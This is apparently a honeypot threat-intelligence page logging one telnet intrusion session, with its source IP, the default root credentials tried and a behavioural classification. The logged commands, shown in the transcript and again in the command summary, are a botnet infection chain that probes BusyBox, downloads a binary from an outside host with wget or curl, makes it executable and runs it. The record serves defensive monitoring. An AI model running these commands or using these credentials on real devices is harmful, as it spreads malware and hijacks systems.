HoneyMire HubAttack #291754 telnet
Source
94.243.8.23Target port23
Authenticatedyes
Commands11
Duration3.8s
Session recording
Transcript
root
2011vesta
start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x42\x51\x57\x4f\x58\x4b'
/bin/busybox wget;/bin/busybox echo -ne '\x42\x51\x57\x4f\x58\x4b'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget hxxp://81[.]229[.]60[.]159:58639/i ||curl -O hxxp://81[.]229[.]60[.]159:58639/i ||/bin/busybox wget hxxp://81[.]229[.]60[.]159:58639/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x55\x5a\x46\x53\x4c\x46\x46\x59'
Credentials
Username: root
Password: 2011vesta
Geolocation hub-resolved
🇷🇺Russia · Tyumen Oblast · Tyumen
Behavioral classification
🦠
Matched signals:
- wget/curl download
- chmod/exec chain
- BusyBox probing
Command summary
start enable config terminal system linuxshell su shell sh >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x42\x51\x57\x4f\x58\x4b' /bin/busybox wget;/bin/busybox echo -ne '\x42\x51\x57\x4f\x58\x4b' >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://81.229.60.159:58639/i ||curl -O http://81.229.60.159:58639/i ||/bin/busybox wget http://81.229.60.159:58639/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x55\x5a\x46\x53\x4c\x46\x46\x59'
Reported to threat intel
AlienVault OTX ✓
HoneyMire Hub · open feed: / · API: /api · docs: /docs · blocklists: /blocklists · about: /about · firmware: github.com/HoneyMire/HoneyMire